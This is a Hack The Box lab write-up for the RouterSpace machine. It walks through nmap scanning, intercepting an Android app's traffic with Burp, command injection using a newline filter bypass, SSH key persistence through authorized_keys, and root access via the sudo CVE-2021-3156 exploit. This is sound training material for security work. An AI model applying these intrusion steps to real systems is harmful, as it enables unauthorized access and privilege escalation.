🗼Router Space
Link: https://app.hackthebox.com/machines/444
Setting-up the Environment
For this machine we will need an Android Emulator and Burpsuit or OWASPZap connected with that android emulator. I will be solving this lab on my Windows machine.
Android Emulator - There are various type of android emulator present like Anbox, Android Studio, Genymotion or you can even decompile the APK and try to reverse the .js files or can use an android phone too. I will be using Genymotion for this lab. Go ahead and download Genymotion, install it and also install any device with android 6.0 above (go for android 8.0). Ones you are done proceed with next step.
Setting up the Proxy - We need to intercept the traffic for the app, so we need to setup a proxy between Genymotion and Burp. Check this https://support.genymotion.com/hc/en-us/articles/360012333077-How-to-use-Burp-suite-with-Genymotion-Desktop-. Hope you are done so let's start.
Reconnaissance
Let's start with Nmap scan nmap -sS -A -sC -sV -p- -T4 -oN scan.txt $ip
We got 2 ports open port 22 and 80 that is SSH and HTTP Server
Let's visit the HTTP server that is port 80
Port 80
Opening it in the any browser we have this static page
No other button was working other than "Download", which will download routerspace.apk
No juicy information was found while looking at the source code of the webpage
Let's test that routerspace.apk that we got
routerspace.apk
Install that apk in our genymotion the app looks like this
It has only one button which seems to check if our router is working or not.
Let's fire up our burp and intercept the request (you have to configure the burp, check #settinguptheenvironment)
Before sending it to the repeater tab let's add routerspace.htb in our hosts file so that our burp can respond.
Windows -
c:\windows\system32\drivers\etc\hostsedit this in notepad as administratorLinux -
sudo nano /etc/hosts
add 10.129.277.47 routerpace.htb replace with your own machine's IP
Now let's send the request to Burp's repeater ctrl+r and check the response
Let's try to modify the string and then check the response.
We can see that it is reflecting the same string with + \n in it.
Let's try some of the basic command injection
Response was the same. It replied with the same sting that we provided.
Try to escape the filter as this type of response are common indication for a successful command injection vulnerability. Let's try
Just add \n before the command
Boom! we escaped the filter and got response which says that server is hosted on paul (user)
User Flag
We have a successful command injection so let's try to get our user flag
Locating the user flag
Now let's try to cat that user.txt
We are halfway done! Let's try to get a rev shell so that we can get the root flag.
Reverse Shell
I tried multiple payloads but not able to get any rev shell.
Let's check the .ssh directory
It was empty. So, we can generate our own public key and import them as authorized_keys in .ssh folder
Let's come back to our Host machine and open terminal or PowerShell (windows)
Type ssh-keygen to generate our own SSH key
Copy the id_rsa.pub and paste it in paul's machine
copy the whole content of id_rsa.pub and
Now when it's done let's connect to paul via ssh
Use putty or open PowerShell with administrative permission
ssh -i .\id_rsa paul@ip
chmod 600 id_rsa
ssh -i id_rsa paul@ip
We are in as paul. Now let's escalate to root
Privilege Escalation
I firstly prefer manual exploration for any privilege escalation
On the first hit I found the vulnerability sudo version 1.8.31
This was vulnerable to CVE-2021-3156
Or if you want to use Linpeas you can copy via scp
Then chmod +x linpeas.sh then run it ./linpeas.sh (On paul's machine)
Now we can use this exploit to spawn the root shell.
Download the exploit.py to our machine and then copy to paul's machine via SCP
Now we have the exploit in the machine so let's run it via python3
and BOOM! we are root.
Let's get our root flag.
Pwned!
Thanks for reading. Hope you have enjoyed and learned something. For any questions feel free to ping me on Twitter or LinkedIn
Last updated